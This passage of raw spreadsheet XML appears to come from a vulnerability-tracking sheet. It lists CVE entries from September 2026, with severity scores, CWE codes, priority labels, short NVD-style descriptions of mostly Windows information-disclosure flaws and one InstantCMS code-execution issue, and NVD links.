/><c r="J1239" s="5" t="inlineStr" /><c r="K1239" s="5" t="inlineStr" /><c r="L1239" s="5" t="inlineStr" /><c r="M1239" s="5" t="inlineStr" /><c r="N1239" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1239" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1239" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1239" s="5" t="inlineStr" /><c r="R1239" s="5" t="inlineStr"><is><t>CWE-434, CWE-94</t></is></c><c r="S1239" s="5" t="inlineStr"><is><t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Remote Code Execution (RCE) issue that allows remote authenticated attackers to execute any PHP code via the component installer. It is possible to upload a malicious component into the server, however, it won't be installed, but upload files will be executed. Normally all php files in upload folder are not executed, however, by uploading custom .htaccess it becomes possible. Version 2.18.2 contains a fix.</t></is></c><c r="T1239" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-54611</t></is></c></row><row r="1240"><c r="A1240" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1240" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1240" s="5" t="inlineStr"><is><t>CVE-2026-68830</t></is></c><c r="D1240" s="5" t="n"><v>5.5</v></c><c r="E1240" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1240" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1240" s="5" t="inlineStr" /><c r="H1240" s="5" t="n"><v>0.003</v></c><c r="I1240" s="5" t="inlineStr" /><c r="J1240" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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0" s="5" t="inlineStr" /><c r="M1240" s="5" t="inlineStr" /><c r="N1240" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1240" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1240" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1240" s="5" t="inlineStr" /><c r="R1240" s="5" t="inlineStr"><is><t>CWE-269, CWE-59</t></is></c><c r="S1240" s="5" t="inlineStr"><is><t>Improper link resolution before file access ('link following') in Windows Universal Plug and Play (UPnP) Device Host allows an authorized attacker to disclose information locally.</t></is></c><c r="T1240" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68830</t></is></c></row><row r="1241"><c r="A1241" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1241" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1241" s="5" t="inlineStr"><is><t>CVE-2026-68831</t></is></c><c r="D1241" s="5" t="n"><v>5.5</v></c><c r="E1241" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1241" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1241" s="5" t="inlineStr" /><c r="H1241" s="5" t="n"><v>0.003</v></c><c r="I1241" s="5" t="inlineStr" /><c r="J1241" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K124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1" s="5" t="inlineStr" /><c r="M1241" s="5" t="inlineStr" /><c r="N1241" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1241" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1241" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1241" s="5" t="inlineStr" /><c r="R1241" s="5" t="inlineStr"><is><t>CWE-552</t></is></c><c r="S1241" s="5" t="inlineStr"><is><t>Files or directories accessible to external parties in Windows Defender Firewall Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1241" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68831</t></is></c></row><row r="1242"><c r="A1242" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1242" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1242" s="5" t="inlineStr"><is><t>CVE-2026-68842</t></is></c><c r="D1242" s="5" t="n"><v>5.5</v></c><c r="E1242" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1242" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1242" s="5" t="inlineStr" /><c r="H1242" s="5" t="n"><v>0.004</v></c><c r="I1242" s="5" t="inlineStr" /><c r="J1242" s="5" t="inlineStr" /><c r="K1242" s="5" t="inlineStr"><is><t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1242" s="5" t="inlineStr" /><c r="M1242" s="5" t="inlineStr" /><c r="N1242" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1242" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1242" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1242" s="5" t="inlineStr" /><c r="R1242" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1242" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="T1242" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68842</t></is></c></row><row r="1243"><c r="A1243" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1243" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1243" s="5" t="inlineStr"><is><t>CVE-2026-68843</t></is></c><c r="D1243" s="5" t="n"><v>5.5</v></c><c r="E1243" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1243" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1243" s="5" t="inlineStr" /><c r="H1243" s="5" t="n"><v>0.003</v></c><c r="I1243" s="5" t="inlineStr" /><c r="J1243" s="5" t="inlineStr" /><c r="K1243" s="5" t="inlineStr" /><c r="L1243" s="5" t="inlineStr" /><c r="M1243" s="5" t="inlineStr" /><c r="N1243" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1243" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1243" s="5" t="inlineStr" /><c r="R1243" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1243" s="5" t="inlineStr"><is><t>Use after free in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="T1243" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68843</t></is></c></row><row r="1244"><c r="A1244" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1244" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1244" s="5" t="inlineStr"><is><t>CVE-2026-68851</t></is></c><c r="D1244" s="5" t="n"><v>5.5</v></c><c r="E1244" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1244" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1244" s="5" t="inlineStr" /><c r="H1244" s="5" t="n"><v>0.003</v></c><c r="I1244" s="5" t="inlineStr" /><c r="J1244" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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4" s="5" t="inlineStr" /><c r="M1244" s="5" t="inlineStr" /><c r="N1244" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1244" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1244" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1244" s="5" t="inlineStr" /><c r="R1244" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1244" s="5" t="inlineStr"><is><t>Buffer over-read in Windows NTFS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1244" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68851</t></is></c></row><row r="1245"><c r="A1245" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1245" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1245" s="5" t="inlineStr"><is><t>CVE-2026-68852</t></is></c><c r="D1245" s="5" t="n"><v>5.5</v></c><c r="E1245" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1245" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1245" s="5" t="inlineStr" /><c r="H1245" s="5" t="n"><v>0.003</v></c><c r="I1245" s="5" t="inlineStr" /><c r="J1245" s="5" t="inlineStr" /><c r="K1245" s="5" t="inlineStr" /><c r="L1245" s="5" t="inlineStr" /><c r="M1245" s="5" t="inlineStr" /><c r="N1245" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1245" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1245" s="5" t="inlineStr" /><c r="R1245" s="5" t="inlineStr"><is><t>CWE-200, CWE-908</t></is></c><c r="S1245" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Account allows an authorized attacker to disclose information locally.</t></is></c><c r="T1245" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68852</t></is></c></row><row r="1246"><c r="A1246" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1246" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1246" s="5" t="inlineStr"><is><t>CVE-2026-68873</t></is></c><c r="D1246" s="5" t="n"><v>5.5</v></c><c r="E1246" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1246" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1246" s="5" t="inlineStr" /><c r="H1246" s="5" t="n"><v>0.005</v></c><c r="I1246" s="5" t="inlineStr" /><c r="J1246" s="5" t="inlineStr" /><c r="K1246" s="5" t="inlineStr" /><c r="L1246" s="5" t="inlineStr" /><c r="M1246" s="5" t="inlineStr" /><c r="N1246" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1246" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1246" s="5" t="inlineStr" /><c r="R1246" s="5" t="inlineStr"><is><t>CWE-532, CWE-908</t></is></c><c r="S1246" s="5" t="inlineStr"><is><t>Insertion of sensitive information into log file in Windows Program Compatibility Assistant Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1246" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68873</t></is></c></row><row r="1247"><c r="A1247" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1247" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1247" s="5" t="inlineStr"><is><t>CVE-2026-68881</t></is></c><c r="D1247" s="5" t="n"><v>5.5</v></c><c r="E1247" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1247" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1247" s="5" t="inlineStr" /><c r="H1247" s="5" t="n"><v>0.003</v></c><c r="I1247" s="5" t="inlineStr" /><c r="J1247" s="5" t="inlineStr" /><c r="K1247" s="5" t="inlineStr" /><c r="L1247" s="5" t="inlineStr" /><c r="M1247" s="5" t="inlineStr" /><c r="N1247" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1247" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1247" s="5" t="inlineStr" /><c r="R1247" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1247" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1247" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68881</t></is></c></row><row r="1248"><c r="A1248" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1248" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1248" s="5" t="inlineStr"><is><t>CVE-2026-68886</t></is></c><c r="D1248" s="5" t="n"><v>5.5</v></c><c r="E1248" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1248" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1248" s="5" t="inlineStr" /><c r="H1248" s="5" t="n"><v>0.005</v></c><c r="I1248" s="5" t="inlineStr" /><c r="J1248" s="5" t="inlineStr" /><c r="K1248" s="5" t="inlineStr" /><c r="L1248" s="5" t="inlineStr" /><c r="M1248" s="5" t="inlineStr" /><c r="N1248" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1248" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1248" s="5" t="inlineStr" /><c r="R1248" s="5" t="inlineStr"><is><t>CWE-209, CWE-416</t></is></c><c r="S1248" s="5" t="inlineStr"><is><t>Use after free in Windows Network Connection Broker allows an authorized attacker to disclose information locally.</t></is></c><c r="T1248" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68886</t></is></c></row><row r="1249"><c r="A1249" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1249" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1249" s="5" t="inlineStr"><is><t>CVE-2026-68895</t></is></c><c r="D1249" s="5" t="n"><v>5.5</v></c><c r="E1249" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1249" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1249" s="5" t="inlineStr" /><c r="H1249" s="5" t="n"><v>0.003</v></c><c r="I1249" s="5" t="inlineStr" /><c r="J1249" s="5" t="inlineStr" /><c r="K1249" s="5" t="inlineStr" /><c r="L1249" s="5" t="inlineStr" /><c r="M1249" s="5" t="inlineStr" /><c r="N1249" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1249" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1249" s="5" t="inlineStr" /><c r="R1249" s="5" t="inlineStr"><is><t>CWE-197</t></is></c><c r="S1249" s="5" t="inlineStr"><is><t>Numeric truncation error in Internet Storage Name Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1249" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68895</t></is></c></row><row r="1250"><c r="A1250" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1250" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1250" s="5" t="inlineStr"><is><t>CVE-2026-69286</t></is></c><c r="D1250" s="5" t="n"><v>5.5</v></c><c r="E1250" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1250" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1250" s="5" t="inlineStr" /><c r="H1250" s="5" t="n"><v>0.004</v></c><c r="I1250" s="5" t="inlineStr" /><c r="J1250" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K12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0" s="5" t="inlineStr" /><c r="M1250" s="5" t="inlineStr" /><c r="N1250" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1250" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1250" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1250" s="5" t="inlineStr" /><c r="R1250" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1250" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to disclose information locally.</t></is></c><c r="T1250" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69286</t></is></c></row><row r="1251"><c r="A1251" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1251" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1251" s="5" t="inlineStr"><is><t>CVE-2026-69288</t></is></c><c r="D1251" s="5" t="n"><v>5.5</v></c><c r="E1251" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1251" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1251" s="5" t="inlineStr" /><c r="H1251" s="5" t="n"><v>0.003</v></c><c r="I1251" s="5" t="inlineStr" /><c r="J1251" s="5" t="inlineStr" /><c r="K1251" s="5" t="inlineStr" /><c r="L1251" s="5" t="inlineStr" /><c r="M1251" s="5" t="inlineStr" /><c r="N1251" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1251" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1251" s="5" t="inlineStr" /><c r="R1251" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1251" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows GDI+ allows an authorized attacker to disclose information locally.</t></is></c><c r="T1251" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69288</t></is></c></row><row r="1252"><c r="A1252" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1252" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1252" s="5" t="inlineStr"><is><t>CVE-2026-69294</t></is></c><c r="D1252" s="5" t="n"><v>5.5</v></c><c r="E1252" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1252" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1252" s="5" t="inlineStr" /><c r="H1252" s="5" t="n"><v>0.003</v></c><c r="I1252" s="5" t="inlineStr" /><c r="J1252" s="5" t="inlineStr" /><c r="K1252" s="5" t="inlineStr" /><c r="L1252" s="5" t="inlineStr" /><c r="M1252" s="5" t="inlineStr" /><c r="N1252" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1252" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1252" s="5" t="inlineStr" /><c r="R1252" s="5" t="inlineStr"><is><t>CWE-209</t></is></c><c r="S1252" s="5" t="inlineStr"><is><t>Generation of error message containing sensitive information in Microsoft COM for Windows allows an authorized attacker to disclose information locally.</t></is></c><c r="T1252" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69294</t></is></c></row><row r="1253"><c r="A1253" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1253" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1253" s="5" t="inlineStr"><is><t>CVE-2026-69303</t></is></c><c r="D1253" s="5" t="n"><v>5.5</v></c><c r="E1253" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1253" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1253" s="5" t="inlineStr" /><c r="H1253" s="5" t="n"><v>0.004</v></c><c r="I1253" s="5" t="inlineStr" /><c r="J1253" s="5" t="inlineStr" /><c r="K1253" s="5" t="inlineStr" /><c r="L1253" s="5" t="inlineStr" /><c r="M1253" s="5" t="inlineStr" /><c r="N1253" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1253" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1253" s="5" t="inlineStr" /><c r="R1253" s="5" t="inlineStr"><is><t>CWE-125, CWE-191</t></is></c><c r="S1253" s="5" t="inlineStr"><is><t>Out-of-bounds read in Push Message Routing Service allows an authorized attacker to disclose information locally.</t></is></c><c r="T1253" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69303</t></is></c></row><row r="1254"><c r="A1254" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1254" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1254" s="5" t="inlineStr"><is><t>CVE-2026-69308</t></is></c><c r="D1254" s="5" t="n"><v>5.5</v></c><c r="E1254" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1254" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1254" s="5" t="inlineStr" /><c r="H1254" s="5" t="n"><v>0.004</v></c><c r="I1254" s="5" t="inlineStr" /><c r="J1254" s="5" t="inlineStr" /><c r="K1254" s="5" t="inlineStr" /><c r="L1254" s="5" t="inlineStr" /><c r="M1254" s="5" t="inlineStr" /><c r="N1254" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1254" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1254" s="5" t="inlineStr" /><c r="R1254" s="5" t="inlineStr"><is><t>CWE-125, CWE-843</t></is></c><c r="S1254" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t></is></c><c r="T1254" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69308</t></is></c></row><row r="1255"><c r="A1255" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1255" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1255" s="5" t="inlineStr"><is><t>CVE-2026-69315</t></is></c><c r="D1255" s="5" t="n"><v>5.5</v></c><c r="E1255" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1255" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1255" s="5" t="inlineStr" /><c r="H1255" s="5" t="n"><v>0.005</v></c><c r="I1255" s="5" t="inlineStr" /><c r="J1255" s="5" t="inlineStr" /><c r="K1255" s="5" t="inlineStr" /><c r="L1255" s="5" t="inlineStr" /><c r="M1255" s="5" t="inlineStr" /><c r="N1255" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1255" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1255" s="5" t="inlineStr" /><c r="R1255" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1255" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows License Manager allows an authorized attacker to disclose information locally.</t></is></c><c r="T1255" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69315</t></is></c></row><row r="1256"><c r="A1256" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1256" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1256" s="5" t="inlineStr"><is><t>CVE-2026-69318</t></is></c><c r="D1256" s="5" t="n"><v>5.5</v></c><c r="E1256" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1256" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1256" s="5" t="inlineStr" /><c r="H1256" s="5" t="n"><v>0.004</v></c><c r="I1256" s="5" t="inlineStr" /><c r="J1256" s="5" t="inlineStr" /><c r="K1256" s="5" t="inlineStr" /><c r="L1256" s="5" t="inlineStr" /><c r="M1256" s="5" t="inlineStr" /><c r="N1256" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1256" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1256" s="5" t="inlineStr" /><c r="R1256" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1256" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Imaging Component allows an authorized attacker to disclose information locally.</t></is></c><c r="T1256" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69318</t></is></c></row><row r="1257"><c r="A1257" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1257" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1257" s="5" t="inlineStr"><is><t>CVE-2026-69321</t></is></c><c r="D1257" s="5" t="n"><v>5.5</v></c><c r="E1257" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1257" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1257" s="5" t="inlineStr" /><c r="H1257" s="5" t="n"><v>0.003</v></c><c r="I1257" s="5" t="inlineStr" /><c r="J1257" s="5" t="inlineStr" /><c r="K1257" s="5" t="inlineStr" /><c r="L1257" s="5" t="inlineStr" /><c r="M1257" s="5" t="inlineStr" /><c r="N1257" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1257" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1257" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1257" s="5" t="inlineStr" /><c r="R1257" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S1257" s="5" t="inlineStr"><is><t>Missing authentication for critical function in Windows Power Dependency Coordinator allows an authorized attacker to perform tampering locally.</t></is></c><c r="T1257" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69321</t></is></c></row><row r="1258"><c r="A1258" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1258" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1258" s="5" t="inlineStr"><is><t>CVE-2026-69339</t></is></c><c r="D1258" s="5" t="n"><v>5.5</v></c><c r="E1258" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1258" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1258" s="5" t="inlineStr" /><c r="H1258" s="5" t="n"><v>0.005</v></c><c r="I1258" s="5" t="inlineStr" /><c r="J1258" s="5" t="inlineStr" /><c r="K1258" s="5" t="inlineStr" /><c r="L1258" s="5" t="inlineStr" /><c r="M1258" s="5" t="inlineStr" /><c r="N1258" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1258" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1258" s="5" t="inlineStr" /><c r="R1258" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1258" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows MIDI Service Module allows an authorized attacker to disclose information locally.</t></is></c><c r="T1258" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69339</t></is></c></row><row r="1259"><c r="A1259" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1259" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1259" s="5" t="inlineStr"><is><t>CVE-2026-69343</t></is></c><c r="D1259" s="5" t="n"><v>5.5</v></c><c r="E1259" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1259" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1259" s="5" t="inlineStr" /><c r="H1259" s="5" t="n"><v>0.004</v></c><c r="I1259" s="5" t="inlineStr" /><c r="J1259" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K125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9" s="5" t="inlineStr" /><c r="M1259" s="5" t="inlineStr" /><c r="N1259" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1259" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1259" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q1259" s="5" t="inlineStr" /><c r="R1259" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1259" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t></is></c><c r="T1259" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69343</t></is></c></row><row r="1260"><c r="A1260" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1260" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1260" s="5" t="inlineStr"><is><t>CVE-2026-69344</t></is></c><c r="D1260" s="5" t="n"><v>5.5</v></c><c r="E1260" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1260" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1260" s="5" t="inlineStr" /><c r="H1260" s="5" t="n"><v>0.004</v></c><c r="I1260" s="5" t="inlineStr" /><c r="J1260" s="5" t="inlineStr" /><c r="K1260" s="5" t="inlineStr" /><c r="L1260" s="5" t="inlineStr" /><c r="M1260" s="5" t="inlineStr" /><c r="N1260" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1260" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1260" s="5" t="inlineStr" /><c r="R1260" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1260" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Print Spooler Components allows an authorized attacker to disclose information locally.</t></is></c><c r="T1260" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69344</t></is></c></row><row r="1261"><c r="A1261" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1261" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1261" s="5" t="inlineStr"><is><t>CVE-2026-69345</t></is></c><c r="D1261" s="5" t="n"><v>5.5</v></c><c r="E1261" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1261" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1261" s="5" 